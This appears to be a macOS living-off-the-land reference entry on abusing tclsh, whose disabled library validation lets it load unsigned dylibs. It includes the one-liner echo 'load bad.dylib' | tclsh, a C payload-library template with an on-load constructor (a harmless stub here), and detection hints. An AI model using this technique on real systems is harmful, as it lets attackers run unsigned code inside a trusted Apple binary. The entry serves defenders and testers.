Created by Brendan Chamberlain (@infosecB)
tclsh is a shell-like utility that runs Tcl from standard input or a file. tclsh carries the “com.apple.security.cs.disable-library-validation” entitlement, so it can load arbitrary plug-ins, frameworks, and libraries that are not signed by Apple or by the same Team ID as tclsh itself.
Execute malicious dynamic library (.dylib) from standard input
An attacker can execute a malicious .dylib from stdin by echoing a Tcl load command and piping it to tclsh. Because library validation is disabled for tclsh, the library does not need to be signed by Apple or with tclsh's Team ID, so the code-signing restriction that normally applies to libraries loaded into a hardened-runtime process does not apply here.
echo "load bad.dylib" | tclsh
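The following is an added example, not code from the original page or from tclsh or Tcl: a minimal payload library for the load command above, written for macOS with Tcl 8.6. It shows the two things a practitioner needs to know about Tcl's load: dyld runs the library's constructor as soon as tclsh dlopen()s it, before Tcl looks for any symbol, and Tcl then resolves an init function whose name it derives from the file name (bad.dylib becomes Bad_Init). The tcl_init_symbol helper reimplements that naming rule (leading "lib" dropped, letters and underscores kept, title-cased, "_Init" appended) so you can predict the symbol for any file name; it is a reimplementation, not Tcl's own code. The symbol Bad_Init is declared with a void * parameter so the example compiles without tcl.h; the real type is Tcl_Interp *.

```c
/* bad.c: payload library for the tclsh `load` technique (added example).
 * Build:  clang -dynamiclib -o bad.dylib bad.c
 * Run:    echo "load ./bad.dylib" | tclsh
 * On Apple Silicon the linker adds an ad-hoc signature automatically; the
 * entitlement only turns off library validation, so no Developer ID or
 * Team-ID match is required.
 */
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define TCL_OK 0

/* Set by the constructor; shows the payload ran before Tcl resolved any symbol. */
int payload_ran = 0;

/* dyld runs this when tclsh dlopen()s the library, i.e. before Tcl looks up
 * Bad_Init. Real payload code would go here; this stub only records that it ran. */
__attribute__((constructor)) static void on_load(void)
{
    payload_ran = 1;
}

/* Derive the init symbol Tcl's `load` looks for when no package name is given.
 * Mirrors the Tcl 8.6 rule (tclLoad.c): take the file's tail, drop a leading
 * "lib", keep letters and underscores up to the first other character,
 * title-case the result, then append "_Init".
 * Returns the output length, or -1 if no name can be derived or buf is too small. */
int tcl_init_symbol(const char *path, char *buf, size_t buflen)
{
    const char *tail = strrchr(path, '/');
    tail = tail ? tail + 1 : path;
    if (strncmp(tail, "lib", 3) == 0)
        tail += 3;

    size_t n = 0;
    while (tail[n] && (isalpha((unsigned char)tail[n]) || tail[n] == '_'))
        n++;

    if (n == 0 || n + strlen("_Init") + 1 > buflen)
        return -1;

    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)tail[i];
        buf[i] = (char)(i == 0 ? toupper(c) : tolower(c));
    }
    strcpy(buf + n, "_Init");
    return (int)(n + strlen("_Init"));
}

/* Entry point Tcl calls for "bad.dylib". Returning TCL_OK makes `load`
 * succeed silently. If this symbol were missing, Tcl would report
 * "couldn't find procedure Bad_Init", but the constructor above would
 * already have executed. */
int Bad_Init(void *interp)
{
    (void)interp;
    return TCL_OK;
}

int main(void)
{
    char sym[64];
    const char *names[] = { "bad.dylib", "libfoo.dylib", "/tmp/my_payload.dylib" };
    for (size_t i = 0; i < 3; i++) {
        if (tcl_init_symbol(names[i], sym, sizeof sym) > 0)
            printf("%-24s -> Tcl resolves %s (constructor ran: %d)\n",
                   names[i], sym, payload_ran);
    }
    return 0;
}
```

For detection, the load is visible as tclsh mapping a dylib from an unusual path (Endpoint Security or a file-monitor showing tclsh opening a .dylib outside /usr/lib and /System), and a process tree of a shell echoing into tclsh is itself a useful hunting signal.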
- Leo Pitt (@_D00mfist)